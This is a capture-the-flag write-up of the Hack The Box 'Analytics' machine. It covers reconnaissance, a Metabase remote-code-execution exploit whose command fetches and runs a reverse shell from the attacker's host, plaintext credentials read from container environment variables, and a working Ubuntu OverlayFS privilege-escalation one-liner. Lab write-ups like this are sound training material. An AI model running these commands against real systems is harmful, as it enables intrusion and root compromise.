easy - Analytics Link to heading
User Link to heading
Ok, so hostname is being revealed:
~z➤ curl -I analytics.htb
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 10 Oct 2023 20:24:22 GMT
Content-Type: text/html
Content-Length: 154
Connection: keep-alive
Location: http://analytical.htb/
~z➤ curl -I analytical.htb
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 10 Oct 2023 20:24:56 GMT
Content-Type: text/html
Content-Length: 17169
Last-Modified: Fri, 25 Aug 2023 15:24:42 GMT
Connection: keep-alive
ETag: "64e8c7ba-4311"
Accept-Ranges: bytes
While nmap says the regular ports 22 and 80 are open:
~z➤ sudo nmap -n -Pn -sV -O -T4 analytics.htb
...
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-10 16:24 -04
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
Reviewing HTML source code Link to heading
Here what seems interesting:
<a class="nav-item nav-link" href="http://data.analytical.htb">Login</a>
<link rel="stylesheet" href="css/jquery.mCustomScrollbar.min.css">
<link rel="stylesheet" href="css/owl.carousel.min.css">
<link rel="stylesheet" href="css/responsive.css">
<p class="copyright_text">Copyright 2023 All Right Reserved By.<a href="https://html.design"> analytical.htb</p>
Also some possible usernames are being leaked:
~z➤ curl -s analytical.htb | elinks --dump
...
Our Team
Jonnhy Smith
Chief Data Officer
Alex Kirigo
Data Engineer
Daniel Walker
Data Analyst
Jonnhy Smith
Chief Data Officer
Alex Kirigo
Data Engineer
Daniel Walker
Data Analyst
Jonnhy Smith
Chief Data Officer
Alex Kirigo
Data Engineer
Daniel Walker
Data Analyst
Contact us
...
[email protected]
[email protected]
...
Turns out the application is running a metabase based app. Which seems to be vulnerable to CVE-2023-38646 ( Youtube PoC https://www.youtube.com/watch?v=b51LPjD-uTo) .
There are many PoC around online.
Let’s prepare a r bash reverse shell file, serve it with python http module and test the PoC:
~z➤ python CVE-2023-38646.py -u http://data.analytical.htb -c "curl http://10.10.14.171:6666/r|bash"
Success get token!
Token: 249fa03d-fd94-4d5b-b94f-b4ebf3df681f
Command: curl http://10.10.14.171:6666/r|bash
Base64 Encoded Command: Y3VybCBodHRwOi8vMTAuMTAuMTQuMTcxOjY2NjYvcnxiYXNo
Exploit success !
Check on your own to validity!
And we’ve got our rev shell:
z➤ nc -lvnp 55555
Connection from 10.129.140.149:52766
bash: cannot set terminal process group (1): Not a tty
bash: no job control in this shell
daf268230e5d:/$ id
id
uid=2000(metabase) gid=2000(metabase) groups=2000(metabase),2000(metabase)
Pivoting outside the container Link to heading
Initially it seemed weird to me that $USER path didn’t have the user.txt file, then I noticed we are in a container and the env vars has sensitive information:
daf268230e5d:~$ ls /home/metabase
plss /home/metabase
daf268230e5d:~ps aux
ps aux
PID USER TIME COMMAND
1 metabase 4:01 java -XX:+IgnoreUnrecognizedVMOptions -Dfile.encoding=UTF-8 -Dlogfile.path=target/log -XX:+CrashOnOutOfMemoryError -server -jar /app/metabase.jar
97 metabase 0:00 bash -c {echo,Y3VybCBodHRwOi8vMTAuMTAuMTQuMTcxOjY2NjYvcnxiYXNo}|{base64,-d}|{bash,-i}
101 metabase 0:00 bash -i
103 metabase 0:00 bash
104 metabase 0:00 bash -i
114 metabase 0:00 ps aux
daf268230e5d:~$ env
...
META_USER=metalytics
META_PASS=An4lytics_ds20223#
So we were not actually pivoting, we just found valid ssh creds:
~z➤ ssh [email protected]
Last login: Tue Oct 3 09:14:35 2023 from 10.10.14.41
...
metalytics@analytics:~$ id
uid=1000(metalytics) gid=1000(metalytics) groups=1000(metalytics)
metalytics@analytics:~$ ls
user.txt
Root Link to heading
No sudo
metalytics@analytics:~$ sudo -l
[sudo] password for metalytics:
Sorry, user metalytics may not run sudo on localhost.
Well, this one is interesting. I didn’t know about this, we are in an Ubuntu 22 which turns out to be vulnerable to a combination of CVEs about filesystem overlay and escalation of privileges. CVEs are CVE-2023-2640 and CVE-2023-32629.
Proof of Concept:
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")'
We just need to run the command bash instead of id and we become root:
metalytics@analytics:~$ unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
> setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("bash")'
root@analytics:~# id
uid=0(root) gid=1000(metalytics) groups=1000(metalytics)
TODOs Link to heading
- Review in depth CVE-2023-38646
- Review in depth CVE-2023-2640 & CVE-2023-32629